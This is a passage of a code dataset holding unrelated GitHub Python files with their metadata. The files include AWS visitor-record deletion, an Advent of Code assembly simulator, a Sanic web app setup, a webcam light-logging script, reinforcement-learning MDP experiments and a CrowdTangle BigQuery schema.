delete_visitor(faceid):\n db_resource = boto3.resource('dynamodb')\n visitors_table = db_resource.Table('Visitors')\n visitors = get_visitor(faceid)\n if len(visitors)>0:\n visitor = visitors[0]\n #delete\n try:\n db_response = visitors_table.delete_item(Key={'faceid': faceid})\n print('deleted:', db_response)\n \n s3 = boto3.resource('s3')\n for item in visitor['photos']:\n s3_response = s3.Object(item['bucket'], item['objectKey']).delete()\n \n rek = boto3.client('rekognition')\n collectionId = 'faceCollection'\n rek_response = rek.delete_faces(CollectionId=collectionId,FaceIds=[faceid])\n \n print(\"RESPONSES:\", db_response,s3_response,rek_response)\n \n except ClientError as e:\n logging.error(e)\n print(\"couldn't delete item from db, s3, or rekognition\")\n return False\n return True\n \n \n \n \n \n \n \n \n","repo_name":"virenbajaj/SmartDoor","sub_path":"Server/Lambda/OwnerAuthentication-LF3/dbMethods.py","file_name":"dbMethods.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30552174173","text":"# Run instructions defined in a file to simulate a simple assembly program\n\ndef read_file(filename):\n values = []\n with open(filename, 'r') as f:\n for line in f:\n values.append(line.strip())\n\n return values\n\n\nif __name__ == \"__main__\":\n print(\"Starting Day 
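`update_status` in the `dbMethods.py` record above makes three separate `update_item` round trips; DynamoDB can set several attributes in one call with a combined `UpdateExpression`. A hedged sketch of the consolidated version (table and attribute names taken from the record, function name is new):

```python
import boto3

def update_status_single_call(faceid, visitor_name, phone_number):
    table = boto3.resource("dynamodb").Table("Visitors")
    # One request instead of three: comma-separated SET clauses.
    return table.update_item(
        Key={"faceid": faceid},
        UpdateExpression=(
            "SET approval_status = :s, phone_number = :p, visitor_name = :n"
        ),
        ExpressionAttributeValues={
            ":s": "approved",
            ":p": phone_number,
            ":n": visitor_name,
        },
        ReturnValues="UPDATED_NEW",
    )
```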
25-1\")\n values = read_file('input.txt')\n\n start_a = 0\n while True:\n # First, setup the registers and starting instruction index\n regs = {'a':start_a, 'b':0, 'c':0, 'd':0}\n index = 0\n\n # Iterate through the program, only stopping once index is outside the bounds of the program\n output = \"\"\n while 0 <= index < len(values) and len(output) < 100:\n instruction = values[index].split()\n # New this time, we need to check to make this is a valid instruction, so check in each part\n if instruction[0] == \"cpy\":\n if instruction[2] not in regs:\n # Skip since the second argument is not a register\n index += 1\n continue\n if instruction[1] in regs:\n regs[instruction[2]] = regs[instruction[1]]\n else:\n regs[instruction[2]] = int(instruction[1])\n elif instruction[0] == \"inc\":\n if instruction[1] not in regs:\n # Skip since the argument is not a register\n index += 1\n continue\n # Increment the register by one\n regs[instruction[1]] += 1\n elif instruction[0] == \"dec\":\n if instruction[1] not in regs:\n # Skip since the argument is not a register\n index += 1\n continue\n # Decrement the register by one\n regs[instruction[1]] -= 1\n elif instruction[0] == \"jnz\":\n if (instruction[1] not in regs and int(instruction[1]) != 0) or \\\n (instruction[1] in regs and regs[instruction[1]] != 0):\n if instruction[2] in regs:\n index += regs[instruction[2]]\n else:\n index += int(instruction[2])\n continue\n elif instruction[0] == \"tgl\":\n # New this time, toggle function changes other functions\n if instruction[1] in regs:\n target = index + regs[instruction[1]]\n else:\n target = index + int(instruction[1])\n if target < 0 or target >= len(values):\n # Out of bounds target, so ignore\n index += 1\n continue\n if \"cpy\" in values[target]:\n values[target] = values[target].replace(\"cpy\", \"jnz\")\n elif \"jnz\" in values[target]:\n values[target] = values[target].replace(\"jnz\", \"cpy\")\n elif \"inc\" in values[target]:\n values[target] = values[target].replace(\"inc\", \"dec\")\n elif \"dec\" in values[target]:\n values[target] = values[target].replace(\"dec\", \"inc\")\n elif \"tgl\" in values[target]:\n values[target] = values[target].replace(\"tgl\", \"inc\")\n elif instruction[0] == \"out\":\n # New to this final iteration, it just outputs whatever the number or register is\n if instruction[1] in regs:\n output += str(regs[instruction[1]])\n else:\n output += str(instruction[1])\n\n # Default increment the index by 1\n index += 1\n\n print(\"Final register values are: {0}\".format(regs))\n print(\"The output pattern is: {0}\".format(output))\n\n passes = True\n for index in range(len(output)):\n if index % 2 != int(output[index]):\n passes = False\n break\n\n if passes:\n break\n else:\n start_a += 1\n\n print(\"The winning start value for a is: {0!s}\".format(start_a))\n","repo_name":"theknoxinator/AoC","sub_path":"2016/Day25/day25-1.py","file_name":"day25-1.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2369329379","text":"\"\"\"Tests for custody_tracker.py.\"\"\"\n# %% Imports\nfrom __future__ import annotations\n\n# Third Party Imports\nfrom numpy import array, ndarray\nfrom numpy.random import rand\n\n# Punch Clock Imports\nfrom punchclock.common.custody_tracker import ( # CovarianceCustody,; TrPosCov,\n CustodyTracker,\n DebugCustody,\n MaxPosStd,\n TrCov,\n)\n\n# %% Test custody functions\nprint(\"\\nTest DebugCustody...\")\nfuncDebug = 
DebugCustody(num_targets=2)\ncustody = funcDebug.update(array([1, 0]))\nprint(f\"custody = {custody}\")\n\nprint(\"\\nTest MaxPosStd...\")\nfuncMaxPosStd = MaxPosStd()\ncustody = funcMaxPosStd(rand(2, 6, 6), 0.5)\nprint(f\"custody = {custody}\")\n\ntest_cov = rand(2, 6, 6)\nfuncTrPosCov = TrCov(pos_vel=\"pos\")\ncustody = funcTrPosCov(test_cov, 0.5)\nprint(f\"custody = {custody}\")\n\nfuncTrPosCov = TrCov(pos_vel=\"vel\")\ncustody = funcTrPosCov(test_cov, 0.5)\nprint(f\"custody = {custody}\")\n\n# %% Test Class\nprint(\"\\nTest CustodyTracker...\")\n# test with defaults\nct = CustodyTracker(3)\ncustody = ct.update(obs=rand(3, 6, 6))\nprint(f\"custody = {custody}\")\n\n# Test with custom config, supported func\nct = CustodyTracker(\n num_targets=3,\n config={\n \"func\": \"max_pos_std\",\n \"threshold\": 0.5,\n },\n)\ncustody = ct.update(obs=rand(3, 6, 6))\nprint(f\"custody = {custody}\")\n\ncustody = ct.update(obs=rand(3, 6, 6), return_map=True)\nprint(f\"custody = {custody}\")\n\n\n# Test with custom func\ndef customCustodyFunc(x: ndarray, b: bool) -> list[bool]:\n \"\"\"Test function.\"\"\"\n return [b for i in range(x.shape[0])]\n\n\nct = CustodyTracker(num_targets=3, config={\"func\": customCustodyFunc})\ncustody = ct.update(obs=rand(3, 6, 6), b=False)\nprint(f\"custody = {custody}\")\n\n# %% Test class with debug func\nprint(\"\\nTest CustodyTracker with DebugCustody...\")\nct = CustodyTracker(\n num_targets=2,\n config={\"func\": DebugCustody(num_targets=2).update},\n)\nct.update(obs=array([1, 0]))\n# %% done\nprint(\"done\")\n","repo_name":"dylan906/clockpunch","sub_path":"tests/common/test_custody_tracker.py","file_name":"test_custody_tracker.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"70155614596","text":"import pandas as pd\n\nPOPULATION_DATA_PATH = '/Users/eduardovillani/git/data-visualization-20201/data/population/pop_per_year_per_country.xls'\n\n\ndef population_data():\n return pd.read_excel(POPULATION_DATA_PATH)\n\n\ndef get_pop_by_year(year, drop_na=True):\n if drop_na:\n data = population_data().dropna()\n else:\n data = population_data()\n data = data[['Country Name',\n 'Country Code',\n str(year)]]\n data = data.rename(columns={str(year): f\"{str(year)}_pop\", \"Country Code\": \"code_pop\"})\n return data[[f'{str(year)}_pop', 'code_pop']]\n","repo_name":"ed-villani/data-visualization-20201","sub_path":"charts/population/population.py","file_name":"population.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
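`get_pop_by_year` in the `population.py` record above returns a frame keyed by `code_pop` with a single `{year}_pop` column; a typical use is merging it onto another country-coded frame. An illustrative sketch (the GDP frame is invented, and the import assumes the module is on the path):

```python
import pandas as pd
from population import get_pop_by_year  # module from the record above

# Hypothetical frame keyed by ISO country code, standing in for real data.
gdp = pd.DataFrame({"code": ["BRA", "USA"], "gdp": [1.9e12, 2.1e13]})

pop = get_pop_by_year(2019)  # columns: ['2019_pop', 'code_pop']
merged = gdp.merge(pop, left_on="code", right_on="code_pop", how="left")
print(merged[["code", "gdp", "2019_pop"]])
```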
\"一般のHTMLをレンダリングする関数です。\"\n title = cl(title)\n description = cl(description)\n content = cl(content)\n return gapp.ctx.env.render(\n f\"{template_folder}/layout.html\", content=content,\n head=f\"\"\"{title}\n \n {head}\"\"\", _=l\n )\n\n\ndef setup_app(app: TypedSanic):\n global gapp\n app.ctx.mysql = ExtendMySQL(app, **Secret[\"mysql\"])\n app.ctx.env = app.ctx.miko = Manager(\n extends={\n \"layout\": layout,\n \"app\": app,\n \"loads\": loads,\n \"dumps\": dumps,\n \"l\": l\n }\n )\n gapp = app\n async def _template(path: str, **kwargs):\n kwargs[\"app\"] = app\n return response.html(await app.ctx.miko.aiorender(\"{}{}\".format(PATH, path), **kwargs))\n app.ctx.template = app.ctx.render = _template\n app.ctx.canary = argv[1] == \"canary\"\n \n @app.on_request\n async def response_content(request: Request):\n if (request.server_name == \"localhost\"\n or request.server_name == \"free-rt.com\"):\n if request.path == \"/\":\n return await app.ctx.template(\"/index.html\", eloop=app.loop, _=l)\n if exists(f\"{PATH}{request.path}\"):\n if request.path.endswith(\".html\"):\n return await app.ctx.template(request.path, eloop=app.loop, _=l)\n else:\n return await response.file(f\"{PATH}{request.path}\")\n else:\n raise SanicException(\"あれ?ここどこだ?真っ白な壁がずっと続いているよ\", status_code=404)\n\n @app.exception(Exception)\n async def on_error(request: Request, exception: Exception):\n if request.status == 404:\n return response.json({}, message=\"ここには何もないよ\", status=404)\n","repo_name":"SakuraProject/rewrite-rt-backend","sub_path":"core/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35580432595","text":"from typing import Optional\n\nfrom armarx_core import slice_loader\n\nslice_loader.load_armarx_slice(\"RobotAPI\", \"aron.ice\")\nslice_loader.load_armarx_slice(\"RobotAPI\", \"armem/memory.ice\")\n\nfrom armarx import aron\nfrom armarx import armem\n\n\ndef get_latest_data(\n entity: armem.data.Entity,\n instance_index=0,\n) -> \"aron.AronData\":\n snapshot: armem.data.EntitySnapshot = list(entity.history.values())[-1]\n instance: armem.data.EntityInstance = snapshot.instances[instance_index]\n return instance.data\n\n\ndef find_entity_by_name(\n name: str,\n core_segment: armem.data.CoreSegment,\n) -> Optional[armem.data.Entity]:\n # Find class\n for prov_name, prov in core_segment.providerSegments.items():\n for entity_name, entity in prov.entities.items():\n if entity_name == name:\n return entity\n return None\n","repo_name":"markusgrotz/python3-armarx","sub_path":"armarx_memory/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14727369613","text":"try:\n import cv2\nexcept ImportError:\n print(\"ERROR python-opencv must be installed\")\n exit(1)\nfrom bh1750 import readLight\nimport datetime\nimport pandas as pd\nimport time\nfrom buffercleaner import *\n\ncap = cv2.VideoCapture(2)\n#cap = cv2.VideoCapture(1)\ncap_cleaner = CameraBufferCleanerThread(cap)\n\nif not cap.isOpened():\n print(\"Camera not found!\")\n exit(1)\n\n#cap.set(3,640)\n#cap.set(4,480)\nprint(f\"Resolution : {cap.get(3)}x{cap.get(4)}\")\nprint(f\"FPS : {cap.get(5)}\")\n\ncv2.namedWindow(\"C920\", cv2.WINDOW_NORMAL | cv2.WINDOW_AUTOSIZE)\nprint(\"Running, ESC or Ctrl-c to exit...\")\ni = 0\ncount = []\nwhile True:\n start = time.time()\n ret, img = cap.read()\n if ret 
\n print(\"Error reading image\")\n break\n\n img = cv2.flip(img,-1)\n #print(img.shape)\n cv2.imshow(\"C920\", img)\n k = cv2.waitKey(27) # wait ~27 ms for a key press\n #print(k)\n now = datetime.datetime.now()\n now_time = now.strftime(\"%m%d_%H%M%S\")\n print(now_time)\n count.append([now_time,readLight()])\n dirname = '/home/pi/Socket/images/sunset'\n \n fname = dirname +'/'+now_time+'.jpg'\n print(fname)\n cv2.imwrite(fname,img)\n\n if k == 109: # k = m\n f = f'sample{i}.jpg'\n cv2.imwrite(f,img)\n print(f'sample{i}.jpg saved')\n print(f'Light = {readLight()}')\n i +=1\n elif k == ord('t'):\n print(f'Light = {readLight()}')\n if k == 27: # ESC\n df = pd.DataFrame(count)\n \n df.to_csv(f\"Light.csv\",mode = 'a', index=False, header=None)\n \n break\n end = time.time()\n delay = max(0.0, 60 - (end - start)) # time left in the 60 s capture period\n time.sleep(delay)\ncv2.destroyAllWindows()\ncap_cleaner.raise_exception()\ncap_cleaner.join()\ncap.release()","repo_name":"yunguks/Socket","sub_path":"camtest_light.py","file_name":"camtest_light.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39995932966","text":"def fatorial(valor, show=False):\r\n resu = 1\r\n mostra = ''\r\n for i in range(valor, 0, -1):\r\n resu *= i\r\n mostra += f' {i} *'\r\n if show:\r\n mostra = mostra[1:-1]\r\n mostra += f'= {resu}'\r\n return resu, mostra\r\n else:\r\n return resu\r\n\r\n\r\nprint(fatorial(valor=12, show=True))\r\n","repo_name":"AllexThiagoSR/Portifolio_python","sub_path":"curso_em_video/ex102.py","file_name":"ex102.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
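The capture loop in the webcam record above paces itself to one frame per minute using wall-clock arithmetic; `time.monotonic()` is the safer clock for measuring elapsed intervals because `time.time()` can jump when the system clock is adjusted. A minimal pacing sketch (illustrative, not from the source):

```python
import time

PERIOD = 60.0  # seconds between captures

def paced(work):
    while True:
        start = time.monotonic()
        work()  # grab a frame, log the light level, etc.
        elapsed = time.monotonic() - start
        # Never sleep a negative amount if the work overran the period.
        time.sleep(max(0.0, PERIOD - elapsed))
```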
+{"seq_id":"20879617563","text":"from loadMDP import loadMDP\nfrom simulator import simulator\nfrom random import randint\nfrom policies import policySelector\nimport parking_MDP\nfrom agnets import MCagent, SARSAagent, QLagent\nfrom plot import generatePlot\n\n\ndef run_policy_simulation(filename, policy, beta, numOfEpisodes, maxSteps, pOfParkingRandom, terminalState = None):\n\n mdp = loadMDP(filename)\n res = simulation(mdp, policy, beta = beta, numOfEpisodes = numOfEpisodes, maxSteps = maxSteps, pOfParkingRandom = pOfParkingRandom, terminalState = terminalState)\n resf.write(\"**********\" + filename[: -4] + \"[policy: \" + policy + \"]\" + (\" (p = \" + str(pOfParkingRandom) + \")\" if \"parking\" in filename else \"\") + \"*********\\n\")\n resf.write(\"Average reward: \" + str(res) + \"\\n\")\n resf.write(\"*********************************************\\n\\n\")\n\n\ndef simulation(mdp, policy, beta = 0.9, numOfEpisodes = 100, maxSteps = 100, pOfParkingRandom = 0.9, terminalState = None):\n rewards = 0\n p = policySelector(policy)\n # print(p)\n for _ in range(numOfEpisodes):\n rewards += eachSimulation(mdp, p, beta, maxSteps, pOfParkingRandom, terminalState)\n\n averageR = rewards / numOfEpisodes\n return averageR\n\ndef eachSimulation(mdp, p, beta, maxSteps, pOfParkingRandom, terminalState):\n _, A, _, _ = mdp\n steps = 0\n cs = 0\n reward = 0\n sim = simulator(mdp, currentS = cs,terminalS = terminalState)\n while steps < maxSteps:\n res = sim.takeAction(p(mdp,cs, p = pOfParkingRandom))\n if res == \"end\":\n break\n elif res == \"illegal\":\n steps -= 1\n else:\n r, cs = res\n reward += (beta ** steps) * r\n steps += 1\n return reward\n\ndef funRL(agent, filename, epsilon, beta, N, terminalS = None):\n mdp = loadMDP(filename)\n if agent == \"MCagent\":\n return MCagent(mdp, epsilon, beta, N, terminalS).learningAndEvaluation()\n elif agent == \"SARSAagent\":\n return SARSAagent(mdp, epsilon, beta, N, terminalS).learningAndEvaluation()\n elif agent == \"QLagent\":\n return QLagent(mdp, epsilon, beta, N, terminalS).learningAndEvaluation()\n\ndef main():\n \n \n run_policy_simulation(\"mdp_test.txt\", \"random\", 0.8, 300, 300, 0.9, terminalState = 4)\n\n run_policy_simulation(\"parking_mdp1.txt\", \"parkingRandomPolicy\", 1, 300, 300, 0.1)\n #run_policy_simulation(\"parking_mdp1.txt\", \"parkingRandomPolicy\", 1, 200, 300, 0.9)\n run_policy_simulation(\"parking_mdp2.txt\", \"parkingRandomPolicy\", 1, 300, 300, 0.1)\n #run_policy_simulation(\"parking_mdp2.txt\", \"parkingRandomPolicy\", 1, 200, 300, 0.9)\n\n run_policy_simulation(\"parking_mdp1.txt\", \"parkingAvoidingOccupuiedPolicy\", 1, 300, 300, 0.1)\n #run_policy_simulation(\"parking_mdp1.txt\", \"parkingAvoidingOccupuiedPolicy\", 1, 200, 300, 0.9)\n run_policy_simulation(\"parking_mdp2.txt\", \"parkingAvoidingOccupuiedPolicy\", 1, 300, 300, 0.1)\n #run_policy_simulation(\"parking_mdp2.txt\", \"parkingAvoidingOccupuiedPolicy\", 1, 200, 300, 0.9)\n\n run_policy_simulation(\"parking_mdp1.txt\", \"parkingSimpleImpovementPolicy\", 1, 300, 300, 0.1)\n #run_policy_simulation(\"parking_mdp1.txt\", \"parkingSimpleImpovementPolicy\", 1, 200, 300, 0.9)\n run_policy_simulation(\"parking_mdp2.txt\", \"parkingSimpleImpovementPolicy\", 1, 300, 300, 0.1)\n #run_policy_simulation(\"parking_mdp2.txt\", \"parkingSimpleImpovementPolicy\", 1, 200, 300, 0.9)\n resf.close()\n print(\"25%\")\n \n N = 1\n N2 = 50\n # N3 = 50000\n \n x11, y11 = funRL(\"MCagent\", \"mdp_test.txt\", 0.05, 0.8, N, terminalS = 4)\n x12, y12 = funRL(\"SARSAagent\", \"mdp_test.txt\", 0.05, 0.8, N, terminalS = 4)\n x13, y13 = funRL(\"QLagent\", \"mdp_test.txt\", 0.05, 0.8, N, terminalS = 4)\n generatePlot(x11, y11, x12, y12, x13, y13, \"mdp_test (e = 0.05)\")\n print(\"generated plot\")\n print(\"40%\")\n x21, y21 = funRL(\"MCagent\", \"mdp_test.txt\", 0.3, 0.8, N, terminalS = 4)\n x22, y22 = funRL(\"SARSAagent\", \"mdp_test.txt\", 0.3, 0.8, N, terminalS = 4)\n x23, y23 = funRL(\"QLagent\", \"mdp_test.txt\", 0.3, 0.8, N, terminalS = 4)\n generatePlot(x21, y21, x22, y22, x23, y23, \"mdp_test (e = 0.3)\")\n print(\"generated plot\")\n print(\"55%\")\n x31, y31 = funRL(\"MCagent\", \"parking_mdp1.txt\", 0.05, 0.999, N2)\n x32, y32 = funRL(\"SARSAagent\", \"parking_mdp1.txt\", 0.05, 0.999, N2)\n x33, y33 = funRL(\"QLagent\", \"parking_mdp1.txt\", 0.05, 0.999, N2)\n generatePlot(x31, y31, x32, y32, x33, y33, \"parking_mdp1 (e = 0.05)\")\n print(\"generated plot\")\n print(\"70%\")\n x41, y41 = funRL(\"MCagent\", \"parking_mdp1.txt\", 0.3, 0.999, N2)\n x42, y42 = funRL(\"SARSAagent\", \"parking_mdp1.txt\", 0.3, 0.999, N2)\n x43, y43 = funRL(\"QLagent\", \"parking_mdp1.txt\", 0.3, 0.999, N2)\n generatePlot(x41, y41, x42, y42, x43, y43, \"parking_mdp1 (e = 0.3)\")\n print(\"generated plot\")\n print(\"80%\")\n x51, y51 = funRL(\"MCagent\", \"parking_mdp2.txt\", 0.05, 0.999, N2)\n x52, y52 = funRL(\"SARSAagent\", \"parking_mdp2.txt\", 0.05, 0.999, N2)\n x53, y53 = funRL(\"QLagent\", \"parking_mdp2.txt\", 0.05, 0.999, N2)\n generatePlot(x51, y51, x52, y52, x53, y53, \"parking_mdp2 (e = 0.05)\")\n print(\"generated plot\")\n print(\"90%\")\n x61, y61 = funRL(\"MCagent\", \"parking_mdp2.txt\", 0.3, 0.999, N2)\n x62, y62 = funRL(\"SARSAagent\", \"parking_mdp2.txt\", 0.3, 0.999, N2)\n x63, y63 = funRL(\"QLagent\", \"parking_mdp2.txt\", 0.3, 0.999, N2)\n generatePlot(x61, y61, x62, y62, x63, y63, \"parking_mdp2 (e = 0.3)\")\n print(\"generated plot\")\n print(\"100%\")\n \n \n\nresf = open(\"results/resultOfPolicySimulation.txt\", 'w')\nmain()\n\n\n","repo_name":"SuerpX/CS533","sub_path":"HW4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
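`eachSimulation` above accumulates `(beta ** steps) * r`, i.e. it estimates the discounted return G = sum_t beta^t * r_t. A tiny standalone helper makes that quantity explicit (illustrative):

```python
def discounted_return(rewards, beta):
    # G = r_0 + beta*r_1 + beta^2*r_2 + ...  (computed back to front)
    g = 0.0
    for r in reversed(rewards):
        g = r + beta * g
    return g

assert abs(discounted_return([1, 1, 1], 0.9) - (1 + 0.9 + 0.81)) < 1e-12
```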
y63, \"parking_mdp2 (e = 0.3)\")\n print(\"generted plot\")\n print(\"100%\")\n \n \n\nresf = open(\"results/resultOfPolicySimulation.txt\", 'w')\nmain()\n\n\n","repo_name":"SuerpX/CS533","sub_path":"HW4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70974196355","text":"\"\"\"Schema adapted from https://github.com/CrowdTangle/API/wiki/Post. Kept in case we decide to write\nCrowdtangle data to Big Query in the future.\"\"\"\nCROWDTANGLE_BIGQUERY_SCHEMAS = {\n 'accounts' : {\n \"description\": \"See account https://github.com/CrowdTangle/API/wiki/Account\",\n \"name\": \"accounts\",\n \"type\": \"RECORD\",\n \"mode\": \"REQUIRED\",\n \"fields\": [\n {\n \"description\": \"The unique identifier of the account in the CrowdTangle system. This ID is specific to CrowdTangle, not the platform on which the account exists.\",\n \"name\": \"id\",\n \"type\": \"INT64\",\n \"mode\": \"PRIMARY_KEY\"\n },\n {\n \"description\": \"For Facebook only. Options are facebook_page, facebook_profile, facebook_group.\",\n \"name\": \"accountType\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The handle or vanity URL of the account.\",\n \"name\": \"handle\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The name of the account.\",\n \"name\": \"name\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The ISO country code of the the country from where the plurality of page administrators operate.\",\n \"name\": \"pageAdminTopCountry\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The platform on which the account exists. enum (facebook, instagram, reddit)\",\n \"name\": \"platform\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The platform's ID for the account. This is not shown for Facebook public users.\",\n \"name\": \"platformId\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"A URL pointing at the profile image.\",\n \"name\": \"profileImage\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The number of subscribers/likes/followers the account has. By default, the subscriberCount property will show page Followers (as of January 26, 2021). You can select either Page Likes or Followers in your Dashboard settings. https://help.crowdtangle.com/en/articles/4797890-faq-measuring-followers.\",\n \"name\": \"subscriberCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"A link to the account on its platform.\",\n \"name\": \"url\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Whether or not the account is verified by the platform, if supported by the platform. If not supported, will return false.\",\n \"name\": \"verified\",\n \"type\": \"BOOLEAN\",\n \"mode\": \"REQUIRED\"\n }\n ]\n },\n 'posts': {\n \"description\": \"A post object represents a single post from any of the supported platforms (e.g., Facebook, Instagram).\",\n \"name\": \"posts\",\n \"type\": \"RECORD\",\n \"mode\": \"REQUIRED\",\n \"fields\": [\n {\n \"description\": \"format (\\\"account.id|postExternalId\\\") The unique identifier of the post in the CrowdTangle system. 
This ID is specific to CrowdTangle, not the platform from which the post originated.\",\n \"name\": \"id\",\n \"type\": \"STRING\",\n \"mode\": \"PRIMARY_KEY\"\n },\n {\n \"description\": \"See account https://github.com/CrowdTangle/API/wiki/Account\",\n \"name\": \"account_id\",\n \"type\": \"INT64\",\n \"mode\": \"REQUIRED\",\n },\n {\n \"description\": \"See account https://github.com/CrowdTangle/API/wiki/Account . This field is only present for Facebook Page posts where there is a sponsoring Page.\",\n \"name\": \"brandedContentSponsor_account_id\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\",\n },\n {\n \"description\": \"The user-submitted text on a post.\",\n \"name\": \"message\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"name\": \"title\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The platform on which the post was posted. E.g., Facebook, Instagram, etc. enum (facebook, instagram, reddit)\",\n \"name\": \"platform\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The platform's ID for the post.\",\n \"name\": \"platformId\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The URL to access the post on its platform.\",\n \"name\": \"postUrl\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The number of subscriber the account had when the post was published. This is in contrast to the subscriberCount found on the account, which represents the current number of subscribers an account has.\",\n \"name\": \"subscriberCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The type of the post. enum (album, igtv, link, live_video, live_video_complete, live_video_scheduled, native_video, photo, status, video, vine, youtube)\",\n \"name\": \"type\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The date and time the post was most recently updated in CrowdTangle, which is most often via getting new scores from the platform. Time zone is UTC. \\\"yyyy-mm-dd hh:mm:ss\\\")\",\n \"name\": \"updated\",\n \"type\": \"DATETIME\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"The length of the video in milliseconds.\",\n \"name\": \"videoLengthMS\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"string The text, if it exists, within an image.\",\n \"name\": \"imageText\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The legacy version of the unique identifier of the post in the CrowdTangle system. This ID is specific to CrowdTangle, not the platform from which the post originated.\",\n \"name\": \"legacyId\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The caption to a photo, if available.\",\n \"name\": \"caption\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"An external URL that the post links to, if available. (Facebook only)\",\n \"name\": \"link\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"date (\\\"yyyy‑mm‑dd hh:mm:ss\\\") The date and time the post was published. Time zone is UTC.\",\n \"name\": \"date\",\n \"type\": \"TIMESTAMP\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Further details, if available. 
Associated with links or images across different platforms.\",\n \"name\": \"description\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The score of a post as measured by the request. E.g. it will represent the overperforming score if the request sortBy specifies overperforming, the interaction rate if the request specifies interaction_rate, etc.\",\n \"name\": \"score\",\n \"type\": \"FLOAT\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"The status of the live video. (\\\"live\\\", \\\"completed\\\", \\\"upcoming\\\")\",\n \"name\": \"liveVideoStatus\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"name of file in GCS\",\n \"name\": \"file_name\",\n \"type\": \"STRING\",\n \"mode\": \"NULLABLE\"\n }\n ]\n },\n 'post_statistics_actual':\n {\n \"description\": \"Actual performance metrics associated with the post.\",\n \"name\": \"post_statistics_actual\",\n \"type\": \"RECORD\",\n \"mode\": \"REQUIRED\",\n \"fields\": [\n {\n \"description\": \"format (\\\"account.id|postExternalId\\\") The unique identifier of the post in the CrowdTangle system. This ID is specific to CrowdTangle, not the platform from which the post originated.\",\n \"name\": \"post_id\",\n \"type\": \"STRING\",\n \"mode\": \"REQUIRED\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"angryCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook, Instagram, Reddit\",\n \"name\": \"commentCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Instagram\",\n \"name\": \"favoriteCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"hahaCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"likeCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"loveCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"sadCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Facebook\",\n \"name\": \"shareCount\",\n \"type\": \"INT64\",\n \"mode\": \"NULLABLE\"\n },\n {\n \"description\": \"Reddit\",\n 